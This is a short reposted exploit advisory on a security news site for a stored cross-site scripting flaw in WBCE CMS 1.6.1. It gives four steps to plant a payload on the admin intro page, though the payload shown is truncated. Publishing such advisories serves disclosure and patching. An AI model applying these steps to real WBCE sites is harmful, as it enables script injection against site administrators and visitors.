Exploit/Advisories no image

Published on July 17th, 2023 📆 | 5751 Views ⚑

0

WBCE 1.6.1 Cross Site Scripting – Torchsec


iSpeech.org

# Exploit Title: WBCE - Stored XSS
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 1.6.1
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com

Steps to Exploit:

1. Login to application
2. Browse to following URI "http://host/wbce/admin/pages/intro.php"
3. Paste XSS payload "TEST">"
4. Then browse to settings "Settings->General Settings->Enable Intro
Page->Enabled"





Source link

Tagged with:



Comments are closed.